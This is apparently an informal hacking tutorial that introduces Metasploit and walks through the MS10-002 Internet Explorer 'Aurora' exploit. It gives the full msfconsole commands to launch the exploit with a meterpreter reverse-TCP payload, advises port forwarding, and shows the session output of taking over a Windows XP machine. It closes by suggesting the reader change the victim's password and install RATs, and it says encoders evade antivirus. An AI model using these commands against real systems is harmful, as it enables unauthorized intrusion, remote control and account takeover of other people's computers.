Before continuing read our disclaimer
Metasploit is an Penetration testing tool by Rapid7(ya the owner of Nexpose).
It was previously open edition and it is now also except for the fact that it has a commercial edition.
So let's get started!
Download Metasploit here
Metasploit Download - Rapid7
Now install it .
It is enormous and runs nearly 6 services so get a fast computer or download the frame mini(not the zip one but above it)
What is Metasploit?
It is an exploitation framework , written in Ruby.
It has a wide range of pre developed exploits and few useful applications like "nmap" attached with it.It was primarily developed for penetration testing but now it has come out to be must needed tool for hackers
So lets start hacking!
start msfconsole Start>Search>msfconsole
or in Linux ./msfconsole
Start by typing
It will show all commands.
Some stuff abt metasploit.
Exploits are methods by which u can get into another system
Payloads are stuff that are injected into other computers when u exploit them
What payloads can do?
They can execute commands or a special shell can function as a RAT(meterpreter).
What are encoders?
Encoders prevent detection by Anti-viruses
Okay now to the serious stuff!
in the console , u can exploit other computers , here i will show abt the famous Internet Explorer Aurora hack .
#1 Windows IE Aurora
type in the following commands
Now it will show like this (but with ur ip)
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST (your IP)
msf exploit(ms10_002_aurora) > set URIPATH /
msf exploit(ms10_002_aurora) > exploit
P.S:-Server is run on Ruby on Rails so u need to portforward.Do not know how ? See Here Port Forward ME!!!
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
Open Internet Explorer on a vulnerable machine (i tested Windows XP SP3 with IE 6) and enter the Local IP URL(i.e the Local IP that metasploit displayed here it is http://192.168.0.151:8080/) into the browser. If the exploit succeeds, you should see a new session in the Metasploit .
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\HackToHell
and u can toy with that computer !!!.
P.s:- to change passwords
You can then install RATS or ur favorite tool.
net user [user_name] [new_password]